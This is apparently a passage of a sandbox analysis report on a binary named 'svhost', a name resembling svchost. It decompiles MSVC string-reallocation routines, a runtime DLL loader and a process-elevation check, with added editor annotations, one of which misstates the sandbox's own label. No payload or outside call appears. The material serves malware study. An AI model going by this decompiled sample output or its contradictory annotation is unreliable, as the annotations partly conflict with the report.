Instruction addresses for E00EA3090, one per line of the function body above, in order (0x00000000 marks a line with no generated code): 0x00ea3090, 0x00ea3097, 0x00ea30aa, 0x00ea30b1, 0x00ea30b3, 0x00ea30b4, 0x00ea30b7, 0x00ea30d0, 0x00ea30d0, 0x00ea30b9, 0x00ea30b9, 0x00ea30bb, 0x00ea30c5, 0x00ea30cc, 0x00ea30ce, 0x00ea30d5, 0x00ea30de, 0x00ea30e1, 0x00ea30e2, 0x00ea30e4, 0x00ea30f8, 0x00ea30f8, 0x00ea3101, 0x00ea30e6, 0x00ea30ed, 0x00ea30f3, 0x00ea30f4, 0x00ea30f6, 0x00ea310a, 0x00ea310c, 0x00ea310c, 0x00000000, 0x00000000, 0x00000000, 0x00ea30f6, 0x00ea310f, 0x00000000, 0x00000000, 0x00000000, 0x00ea30ce, 0x00ea30bb, 0x00ea3117, 0x00ea3121, 0x00ea3099, 0x00ea309b, 0x00ea309b

                                      APIs
                                      • GetLastError.KERNEL32(?,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA309E
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EA30AC
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EA30C5
                                      • SetLastError.KERNEL32(00000000,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA3117
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
• Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: e7fc13a8ded0fc1ba66326f3cb800cc13c5f3603a99dfde240e45f0d58b6a5ae
                                      • Instruction ID: 5e5d46d3a6d6c412115880a76b480c83084b25da341a40c71cbd15484e6a0830
                                      • Opcode Fuzzy Hash: e7fc13a8ded0fc1ba66326f3cb800cc13c5f3603a99dfde240e45f0d58b6a5ae
                                      • Instruction Fuzzy Hash: 2301287260A319DDA62026B6BCC69572BD8DBAB379720233EF5147D0F2EF516C059110
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E64DD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t61;
                                      				void* _t65;
                                      				signed int _t132;
                                      
                                      				_t131 = __esi;
                                      				_t130 = __edi;
                                      				_t94 = __ebx;
                                      				_t61 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t61 ^ _t132;
                                      				_v20 = __ecx;
				_v16 = E00E51100(_v20); // string representation; the +0x10/+0x14 layout and the SSO split below match MSVC STL basic_string::_Reallocate_grow_by
				_v24 =  *((intOrPtr*)(_v16 + 0x10)); // old size (_Mysize)
				_t65 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags); // max_size()
				_t9 =  &_v24; // 0xe6417b
				_t139 = _t65 -  *_t9 - _a4;
				if(_t65 -  *_t9 < _a4) { // max_size() - size < count
					E00E5BFD0(); // length error ("string too long")
				}
				_t11 =  &_v24; // 0xe6417b
				_v32 =  *_t11 + _a4; // new size
				_v40 =  *((intOrPtr*)(_v16 + 0x14)); // old capacity (_Myres)
				_v36 = E00E5C0F0(_t94, _v20, _v32, _t130, _t131, _t139, _v32); // growth policy: new capacity for the new size
				_v28 = E00E56580(_v20); // allocator
				_v12 = E00E59B70(_v28, _t139,  ~(0 | _t139 > 0x00000000) | _v36 + 0x00000001); // allocate(new capacity + 1) for the terminator
				E00E516F0(_t74, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) { // old capacity below 16: the contents live in the in-object SSO buffer
					_t50 =  &_a16; // 0xe6417b
					_t52 =  &_v24; // 0xe6417b
					E00E64190( &_a8, _v48, _v16,  *_t52, _a12,  *_t50 & 0x000000ff); // caller's functor copies from the SSO buffer into the new block
					_t125 =  &_v12;
					E00E5B410(_v28, _v28, E00E51650(_v16),  &_v12); // store the new pointer over the SSO buffer
				} else {
					asm("lfence"); // speculative-execution barrier, consistent with MSVC /Qspectre after the capacity branch
					_v44 =  *_v16; // old heap pointer
					_t39 =  &_a16; // 0xe6417b
					_t41 =  &_v24; // 0xe6417b
					E00E64190( &_a8, _v48, E00E51650(_v44),  *_t41, _a12,  *_t39 & 0x000000ff); // functor copies from the old heap block
					E00E59BA0(_v28, _v44, _v40 + 1); // deallocate(old pointer, old capacity + 1)
					_t125 = _v12;
					 *_v16 = _v12; // pointer now refers to the new block
				}
				return E00E89A35(_t94, _v8 ^ _t132, _t125, _t130, _t131); // __security_check_cookie
                                      			}

















                                      Instruction addresses for the listing above (per-line address column flattened by extraction): 0x00e64dd0 .. 0x00e64f1a

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64E4B
                                      • allocator.LIBCONCRTD ref: 00E64EC1
                                        • Part of subcall function 00E64190: char_traits.LIBCPMTD ref: 00E641BD
                                      • construct.LIBCPMTD ref: 00E64F02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valuechar_traitsconstruct
                                      • String ID: {A${A
                                      • API String ID: 92201317-698609641
                                      • Opcode ID: 62253ab8569db0bfa26190b0680c01771402622c66e91fa36a7b0c6d6f563fd9
                                      • Instruction ID: 487186777424f655b88b005d914695bf8b3f4c51169dc012de36217d2ff5ebeb
                                      • Opcode Fuzzy Hash: 62253ab8569db0bfa26190b0680c01771402622c66e91fa36a7b0c6d6f563fd9
                                      • Instruction Fuzzy Hash: 8141C5B5E00109AFCB08DFA8D8919EEB7F5FF88300F149559E915B7391DB30AA44CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E64F20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				intOrPtr _v20;
                                      				char _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t61;
                                      				void* _t65;
                                      				signed int _t132;
                                      
				// Editor's annotation, not from the sandbox output: the same MSVC STL grow-and-reallocate
				// routine as the listing above, instantiated for wchar_t (note the < 8 threshold below and
				// the absence of the & 0xff byte mask on the fill character).
				_t131 = __esi;
				_t130 = __edi;
				_t94 = __ebx;
				_t61 =  *0xeef074; // 0x221cac15 -- /GS stack cookie
				_v8 = _t61 ^ _t132;
                                      				_v20 = __ecx;
                                      				_v16 = E00E51100(_v20);
                                      				_v24 =  *((intOrPtr*)(_v16 + 0x10));
                                      				_t65 = E00E59FC0(__ebx, _v20, __edi, __esi);
                                      				_t9 =  &_v24; // 0xe64331
                                      				_t139 = _t65 -  *_t9 - _a4;
				if(_t65 -  *_t9 < _a4) { // max_size() - size < count_increase
					E00E5BFD0(); // length error: string too long
				}
                                      				_t11 =  &_v24; // 0xe64331
                                      				_v32 =  *_t11 + _a4;
                                      				_v40 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_v36 = E00E5BFE0(_t94, _v20, _v32, _t130, _t131, _t139, _v32);
                                      				_v28 = E00E56580(_v20);
                                      				_v12 = E00E5A120(_v28,  ~(0 | _t139 > 0x00000000) | _v36 + 0x00000001);
                                      				E00E516F0(_t74, _v16);
                                      				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
				if(_v40 < 8) { // 16-byte inline buffer holds 8 wchar_t: characters still in the SSO buffer
                                      					_t50 =  &_a16; // 0xe64331
                                      					_t52 =  &_v24; // 0xe64331
                                      					E00E64340( &_a8, _v48, _v16,  *_t52, _a12,  *_t50);
                                      					_t125 =  &_v12;
                                      					E00E5B410(_v28, _v28, E00E51650(_v16),  &_v12);
                                      				} else {
					asm("lfence"); // compiler-emitted /Qspectre barrier
                                      					_v44 =  *_v16;
                                      					_t39 =  &_a16; // 0xe64331
                                      					_t41 =  &_v24; // 0xe64331
                                      					E00E64340( &_a8, _v48, E00E51650(_v44),  *_t41, _a12,  *_t39);
					E00E5A150(_v28, _v44, _v40 + 1); // deallocate(old pointer, old capacity + 1)
                                      					_t125 = _v12;
                                      					 *_v16 = _v12;
                                      				}
				return E00E89A35(_t94, _v8 ^ _t132, _t125, _t130, _t131); // __security_check_cookie
                                      			}

















                                      Instruction addresses for the listing above (per-line address column flattened by extraction): 0x00e64f20 .. 0x00e65068

                                      APIs
                                        • Part of subcall function 00E59FC0: _Max_value.LIBCPMTD ref: 00E59FF6
                                        • Part of subcall function 00E59FC0: _Min_value.LIBCPMTD ref: 00E5A01C
                                      • allocator.LIBCONCRTD ref: 00E64F9B
                                      • allocator.LIBCPMTD ref: 00E65010
                                      • construct.LIBCPMTD ref: 00E65050
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: 1C$1C
                                      • API String ID: 3172100163-2717644508
                                      • Opcode ID: 4b4ba5edf768413719a9dce836f3ee01de7e990d46bc5e6cf4abd2c9875e3cb9
                                      • Instruction ID: 7c02674e65334d3076a612a9928fbcec0d939f47d5f365a25b9a96bec8bad89d
                                      • Opcode Fuzzy Hash: 4b4ba5edf768413719a9dce836f3ee01de7e990d46bc5e6cf4abd2c9875e3cb9
                                      • Instruction Fuzzy Hash: 7641C6B5E00109AFCB08DFA8D9919EEB7F5FF88300F109569E919B7351D730AA04CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 97%
                                      			E00E64810(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
                                      				signed int _v8;
                                      				char _v12;
                                      				char _v16;
                                      				intOrPtr _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr _v36;
                                      				intOrPtr _v40;
                                      				intOrPtr _v44;
                                      				intOrPtr _v48;
                                      				signed int _t57;
                                      				void* _t61;
                                      				void* _t83;
                                      				signed int _t124;
                                      
				// Editor's annotation, not from the sandbox output: a third instantiation of the MSVC STL
				// basic_string<char> grow-and-reallocate routine; its functor (E00E63390) receives the old
				// size (_v24) instead of a fill character, i.e. a copy-old-then-append step.
				_t123 = __esi;
				_t122 = __edi;
				_t90 = __ebx;
				_t57 =  *0xeef074; // 0x221cac15 -- /GS stack cookie
				_v8 = _t57 ^ _t124;
                                      				_v20 = __ecx;
                                      				_v16 = E00E51100(_v20);
                                      				_t5 =  &_v16; // 0xe6335e
                                      				_v24 =  *((intOrPtr*)( *_t5 + 0x10));
                                      				_t61 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
                                      				_t131 = _t61 - _v24 - _a4;
				if(_t61 - _v24 < _a4) { // max_size() - size < count_increase
					E00E5BFD0(); // length error: string too long
				}
                                      				_v32 = _v24 + _a4;
                                      				_t14 =  &_v16; // 0xe6335e
                                      				_v40 =  *((intOrPtr*)( *_t14 + 0x14));
                                      				_v36 = E00E5C0F0(_t90, _v20, _v32, _t122, _t123, _t131, _v32);
                                      				_v28 = E00E56580(_v20);
                                      				_v12 = E00E59B70(_v28, _t131,  ~(0 | _t131 > 0x00000000) | _v36 + 0x00000001);
                                      				_t27 =  &_v16; // 0xe6335e
                                      				E00E516F0(_t70,  *_t27);
                                      				_t28 =  &_v16; // 0xe6335e
                                      				 *((intOrPtr*)( *_t28 + 0x10)) = _v32;
                                      				_t31 =  &_v16; // 0xe6335e
                                      				 *((intOrPtr*)( *_t31 + 0x14)) = _v36;
                                      				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) { // old capacity below 16: characters still in the inline (SSO) buffer
                                      					_t49 =  &_v16; // 0xe6335e
                                      					_t51 =  &_a8; // 0xe6335e
                                      					E00E63390(_t51, _v48,  *_t49, _v24);
                                      					_t53 =  &_v16; // 0xe6335e
                                      					_t119 =  *_t53;
                                      					E00E5B410( &_v12, _v28, E00E51650( *_t53),  &_v12);
                                      				} else {
					asm("lfence"); // compiler-emitted /Qspectre barrier
                                      					_t37 =  &_v16; // 0xe6335e
                                      					_v44 =  *((intOrPtr*)( *_t37));
                                      					_t83 = E00E51650(_v44);
                                      					_t42 =  &_a8; // 0xe6335e
                                      					E00E63390(_t42, _v48, _t83, _v24);
					E00E59BA0(_v28, _v44, _v40 + 1); // deallocate(old pointer, old capacity + 1)
                                      					_t46 =  &_v16; // 0xe6335e
                                      					_t119 =  *_t46;
                                      					 *((intOrPtr*)( *_t46)) = _v12;
                                      				}
				return E00E89A35(_t90, _v8 ^ _t124, _t119, _t122, _t123); // __security_check_cookie
                                      			}


















                                      Instruction addresses for the listing above (per-line address column flattened by extraction): 0x00e64810 .. 0x00e64948

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E6488B
                                      • allocator.LIBCONCRTD ref: 00E648F8
                                      • construct.LIBCPMTD ref: 00E64930
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: ^3$^3
                                      • API String ID: 3172100163-3838005690
                                      • Opcode ID: b15b31f01437278f21c099e0deeadba5ac6ff7d38fa4b64f600a8bff240d62c5
                                      • Instruction ID: 1f9e6f5b4166e2e53db8b1f0be64d6040e39475be12572306b83047cebdfc7b0
                                      • Opcode Fuzzy Hash: b15b31f01437278f21c099e0deeadba5ac6ff7d38fa4b64f600a8bff240d62c5
                                      • Instruction Fuzzy Hash: D541B7B5E00109AFCB08EFA8D8919EEB7F5FF48300F109569E915B7351DB30AA45CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 96%
                                      			E00E66760(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr* _v16;
                                      				char _v20;
                                      				intOrPtr _v24;
                                      				intOrPtr _v28;
                                      				intOrPtr _v32;
                                      				signed int _t42;
                                      				void* _t44;
                                      				signed int _t96;
                                      
				// Editor's annotation, not from the sandbox output: the reallocate-for-new-size variant
				// of the same MSVC STL basic_string routine. The requested size _a4 is compared with
				// max_size() directly and becomes the new size (stored at +0x10 below), and the
				// functor runs before the inline-buffer-vs-heap branch instead of inside it.
				_t95 = __esi;
				_t94 = __edi;
				_t69 = __ebx;
				_t42 =  *0xeef074; // 0x221cac15 -- /GS stack cookie
				_v8 = _t42 ^ _t96;
                                      				_v20 = __ecx;
                                      				_t3 =  &_v20; // 0xe66472
                                      				_t44 = E00E596F0(__ebx,  *_t3, __edi, __esi, __eflags);
                                      				_t102 = _a4 - _t44;
				if(_a4 > _t44) { // requested size > max_size()
					E00E5BFD0(); // length error: string too long
				}
                                      				_t5 =  &_v20; // 0xe66472
                                      				_v16 = E00E51100( *_t5);
                                      				_v32 =  *((intOrPtr*)(_v16 + 0x14));
                                      				_t11 =  &_v20; // 0xe66472
                                      				_v28 = E00E5C0F0(_t69,  *_t11, _a4, _t94, _t95, _t102, _a4);
                                      				_t13 =  &_v20; // 0xe66472
                                      				_v24 = E00E56580( *_t13);
                                      				_v12 = E00E59B70(_v24, _t102,  ~(0 | _t102 > 0x00000000) | _v28 + 0x00000001);
                                      				E00E516F0(_t53, _v16);
                                      				 *((intOrPtr*)(_v16 + 0x10)) = _a4;
                                      				 *((intOrPtr*)(_v16 + 0x14)) = _v28;
                                      				_t27 =  &_a12; // 0xe66472
                                      				E00E66480( &_a8, E00E51650(_v12), _a4,  *_t27 & 0x000000ff);
				if(_v32 < 0x10) { // old capacity below 16: old storage was the inline buffer, nothing to free
                                      					_t93 =  &_v12;
                                      					E00E5B410(_v24, _v24, E00E51650(_v16),  &_v12);
                                      				} else {
					asm("lfence"); // compiler-emitted /Qspectre barrier
                                      					_t93 =  *_v16;
					E00E59BA0(_v24,  *_v16, _v32 + 1); // deallocate(old pointer, old capacity + 1)
                                      					 *_v16 = _v12;
                                      				}
				return E00E89A35(_t69, _v8 ^ _t96, _t93, _t94, _t95); // __security_check_cookie
                                      			}













                                      Instruction addresses for the listing above (per-line address column flattened by extraction): 0x00e66760 .. 0x00e6685b

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E667C6
                                      • allocator.LIBCONCRTD ref: 00E6681F
                                      • construct.LIBCPMTD ref: 00E66843
                                      Strings
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: rd$rd
                                      • API String ID: 3172100163-1634083973
                                      • Opcode ID: 73e5042332a150369fd0effe7970f437e27512062d3da4a216a13a2cd8cb185b
                                      • Instruction ID: f66f28ee89c03693afec66e4a19d0470a6821d998cdc1dd734cbcd8522918076
                                      • Opcode Fuzzy Hash: 73e5042332a150369fd0effe7970f437e27512062d3da4a216a13a2cd8cb185b
                                      • Instruction Fuzzy Hash: A6310B75E10109AFCB08EFA8D8919AFB7B5FF48301F10856DE815B7352DB30AA04CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			// Editor's note (not decompiler output): this is the MSVC UCRT's lazy module lookup
                                      			// (try_get_first_available_module in winapi_thunks.cpp), not ransomware logic. For each
                                      			// module id in [_a4, _a8) it returns the HMODULE cached at 0xef3380[id], loading the name
                                      			// from 0xec9790[id] with LoadLibraryExW(name, 0, LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800).
                                      			// If that flag is rejected with ERROR_INVALID_PARAMETER (0x57, older Windows) it retries
                                      			// without it unless the name starts with "api-ms-" (E00EB0488 is wcsncmp here). A failed
                                      			// load is cached as -1 so it is never retried; the FreeLibrary after the store is the
                                      			// "another thread already cached it" branch of an interlocked exchange.
                                      			// Trailing "@0x..." markers are the report's per-statement addresses.
                                      			E00EA4102(void* __ecx, signed int* _a4, intOrPtr _a8) {
                                      				signed int* _v8;
                                      				void** _t12;
                                      				void* _t16;
                                      				void* _t18;
                                      				signed int _t22;
                                      				WCHAR* _t23;
                                      				void** _t26;
                                      				signed int* _t29;
                                      				void* _t32;
                                      				void* _t34;
                                      
                                      				_t29 = _a4; // @0x00ea4109
                                      				while(_t29 != _a8) { // @0x00ea419a
                                      					_t22 =  *_t29; // @0x00ea4111
                                      					_t12 = 0xef3380 + _t22 * 4; // @0x00ea4113
                                      					_t32 =  *_t12; // @0x00ea411a
                                      					_v8 = _t12; // @0x00ea411c
                                      					if(_t32 == 0) { // @0x00ea4121
                                      						_t23 =  *(0xec9790 + _t22 * 4); // @0x00ea412a
                                      						_t32 = LoadLibraryExW(_t23, 0, 0x800); // @0x00ea413f
                                      						if(_t32 != 0) { // @0x00ea4143
                                      							L11: // @0x00ea4181
                                      							_t26 = _v8; // @0x00ea4181
                                      							 *_t26 = _t32; // @0x00ea4186
                                      							if( *_t26 != 0) { // @0x00ea418a
                                      								FreeLibrary(_t32); // @0x00ea418d
                                      							} // @0x00ea418d
                                      							L13: // @0x00ea4193
                                      							if(_t32 != 0) { // @0x00ea4195
                                      								_t16 = _t32; // @0x00ea41aa
                                      								L17: // @0x00ea41a5
                                      								return _t16; // @0x00ea41a9
                                      							} // @0x00ea41a9
                                      							L14: // @0x00ea4197
                                      							_t29 =  &(_t29[1]); // @0x00ea4197
                                      							continue;
                                      						} // @0x00ea4197
                                      						_t18 = GetLastError(); // @0x00ea4145
                                      						if(_t18 != 0x57) { // @0x00ea414e
                                      							L8: // @0x00ea4171
                                      							_t32 = 0; // @0x00ea4171
                                      							L9: // @0x00ea4173
                                      							if(_t32 != 0) { // @0x00ea4175
                                      								goto L11;
                                      							}
                                      							 *_v8 = _t18 | 0xffffffff; // @0x00ea417d
                                      							goto L14;
                                      						} // @0x00ea417d
                                      						_t18 = E00EB0488(_t23, L"api-ms-", 7); // @0x00ea4158
                                      						_t34 = _t34 + 0xc; // @0x00ea415d
                                      						if(_t18 == 0) { // @0x00ea4162
                                      							goto L8;
                                      						}
                                      						_t18 = LoadLibraryExW(_t23, _t32, _t32); // @0x00ea4167
                                      						_t32 = _t18; // @0x00ea416d
                                      						goto L9;
                                      					} // @0x00ea416d
                                      					if(_t32 == 0xffffffff) { // @0x00ea4126
                                      						goto L14;
                                      					}
                                      					goto L13;
                                      				} // @0x00ea4128
                                      				_t16 = 0; // @0x00ea41a3
                                      				goto L17;
                                      			}

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-
                                      • API String ID: 0-2084034818
                                      • Opcode ID: 820f941db30c0f7ffbdf8d13c146f8b760d241db38cc280638fb849677a5e7af
                                      • Instruction ID: 703ba05a8c7ff6813784d8fd18872bb4f80a213c4b5c27bfeb2bb031337117ea
                                      • Opcode Fuzzy Hash: 820f941db30c0f7ffbdf8d13c146f8b760d241db38cc280638fb849677a5e7af
                                      • Instruction Fuzzy Hash: 0C11DAB1A03211EBCB218B258C45A9A37989FBA7A4B111524E811BF2D1D7B0FD4185D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			// Editor's note (not decompiler output): "is this process elevated?" check, a thiscall
                                      			// method (this is parked in _v28 and not used). OpenProcessToken(TOKEN_QUERY = 8), then
                                      			// GetTokenInformation(TokenElevation = 0x14) into a 4-byte TOKEN_ELEVATION; _v22 becomes 1
                                      			// when TokenIsElevated is non-zero and is the value handed back to the caller. The sandbox's
                                      			// API annotation names class 0x14 TokenIntegrityLevel, but that class is 0x19 and returns a
                                      			// TOKEN_MANDATORY_LABEL that does not fit in 4 bytes. *0xeef074 is __security_cookie and
                                      			// E00E89A35 is __security_check_cookie: the decompiler shows the /GS epilogue in place of
                                      			// the flag that is actually returned. Trailing "@0x..." markers are the report's addresses.
                                      			E00E70AE0(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				void _v12;
                                      				long _v16;
                                      				void* _v20;
                                      				char _v21;
                                      				char _v22;
                                      				intOrPtr _v28;
                                      				signed int _t20;
                                      				void* _t31;
                                      				void* _t38;
                                      				void* _t39;
                                      				signed int _t40;
                                      
                                      				_t20 =  *0xeef074; // 0x221cac15 @0x00e70ae6
                                      				_v8 = _t20 ^ _t40; // @0x00e70aed
                                      				_v28 = __ecx; // @0x00e70af0
                                      				_v22 = 0; // @0x00e70af3
                                      				_v20 = 0; // @0x00e70af7
                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) { // @0x00e70b13
                                      					_v12 = 0; // @0x00e70b17
                                      					_v16 = 4; // @0x00e70b1a
                                      					_t37 =  &_v16; // @0x00e70b21
                                      					if(GetTokenInformation(_v20, 0x14,  &_v12, 4,  &_v16) != 0) { // @0x00e70b39
                                      						if(_v12 == 0) { // @0x00e70b3f
                                      							_v21 = 0; // @0x00e70b47
                                      						} else { // @0x00e70b41
                                      							_v21 = 1; // @0x00e70b41
                                      						} // @0x00e70b41
                                      						_t37 = _v21; // @0x00e70b4b
                                      						_v22 = _v21; // @0x00e70b4e
                                      					} // @0x00e70b4e
                                      				} // @0x00e70b39
                                      				if(_v20 != 0) { // @0x00e70b55
                                      					CloseHandle(_v20); // @0x00e70b5b
                                      				} // @0x00e70b5b
                                      				_t19 =  &_v8; // 0xe55d4a @0x00e70b64
                                      				return E00E89A35(_t31,  *_t19 ^ _t40, _t37, _t38, _t39); // @0x00e70b71
                                      			}

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00E70B04
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E70B0B
                                      • GetTokenInformation.ADVAPI32(00000000,00000014(TokenElevation),?,00000004,00000004), ref: 00E70B31
                                      • CloseHandle.KERNEL32(00000000), ref: 00E70B5B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                      • String ID: J]
                                      • API String ID: 215268677-2570422865
                                      • Opcode ID: c0c6913e0011d5b5886eee328e340262fbf713619b2d51270c84a8977a7e81c8
                                      • Instruction ID: 4dfbbbc65710880363208348c915822750c21232bb6c7ff0588648f08bd2be16
                                      • Opcode Fuzzy Hash: c0c6913e0011d5b5886eee328e340262fbf713619b2d51270c84a8977a7e81c8
                                      • Instruction Fuzzy Hash: 37114FB0D04249DEDF00DFE4D85ABFEBBB8AF04304F044498A609B7281CBB5460DDBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%
